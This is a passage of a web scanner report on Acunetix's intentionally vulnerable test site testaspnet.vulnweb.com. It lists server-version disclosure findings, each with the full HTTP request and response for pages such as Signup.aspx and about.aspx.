Request Header - size: 323 bytes.	GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13106
Response Body - size: 13,106 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc+mKdRBm3AUE" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/sitemap.xml
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 283 bytes.	GET http://testaspnet.vulnweb.com/sitemap.xml HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 1245
Response Body - size: 1,245 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/styles.css
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/styles.css HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Thu, 29 May 2008 14:36:50 GMT Accept-Ranges: bytes ETag: "c8c2136e99c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2597
Response Body - size: 2,597 bytes.	body { padding-right: 0px; padding-left: 0px; list-style-position: outside; background: url(images/background.gif) #e6dccf fixed repeat-y center top; padding-bottom: 0px; margin: 0px; font: small tahoma, "Bitstream Vera Sans" , "Trebuchet MS" , "Lucida Grande" , lucida, helvetica, sans-serif; padding-top: 0px; list-style-type: square; } A.menu { padding-right: 10px; padding-left: 10px; color: #806640; text-decoration: none; background-color: #e6dccf; } A.menu:hover { padding-right: 10px; padding-left: 10px; color: #e6dccf; text-decoration: none; background-color: #BF8630; } A.NewsOperation { font-size: xx-small; margin-left: 5px; color: #BF8630; margin-right: 5px; text-decoration: none; } A.NewsOperation:hover { font-size: xx-small; margin-left: 5px; color: #E6B873; margin-right: 5px; text-decoration: none; } .Framed { border: #E6DCCF 1px solid; } .FramedForm { border-right: #806640 1px solid; border-top: #806640 1px solid; border-left: #806640 1px solid; border-bottom: #806640 1px solid; background-color: #e6dccf; } .MenuBar { border-top: #806640 1px solid; border-bottom: #806640 1px solid; background-color: #e6dccf; } .Calendar { border-right: #e6b873 1px solid; border-top: #e6b873 1px solid; border-left: #e6b873 1px solid; border-bottom: #e6b873 1px solid; } INPUT { border: #806640 1px solid; } INPUT.classic { border: none; } TEXTAREA { border: #807940 1px solid; } INPUT.PostNews { border: #807940 1px solid; width: 500px; } INPUT.Login { border: #807940 1px solid; width: 250px; } TEXTAREA.PostNews { border: #807940 1px solid; width: 500px; height: 300px; } TEXTAREA.CommentTA { border: #807940 1px solid; width: 450px; height: 100px; } .NewsDate { border-top: #e6b873 2px solid; font-size: xx-small; border-bottom: #e6b873 1px solid; } .NewsTitle { font-weight: bolder; margin-bottom: 5px; text-transform: capitalize; padding-top: 2px; } .NewsShort { padding-left: 5px; margin-bottom: 10px; } .NewsLong { padding-left: 5px; margin-bottom: 10px; border-bottom: #e6b873 1px solid; } .CommentText { margin-top: 10px; margin-bottom: 5px; } .CommentAuthor { font-size: xx-small; margin-bottom: 10px; } .Comment { clear: both; border-right: #806640 1px solid; padding-right: 5px; padding-left: 5px; float: none; padding-bottom: 5px; border-left: #806640 1px solid; width: 500px; padding-top: 5px; } .Calendar { border: solid 1px #E6B873; }
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td 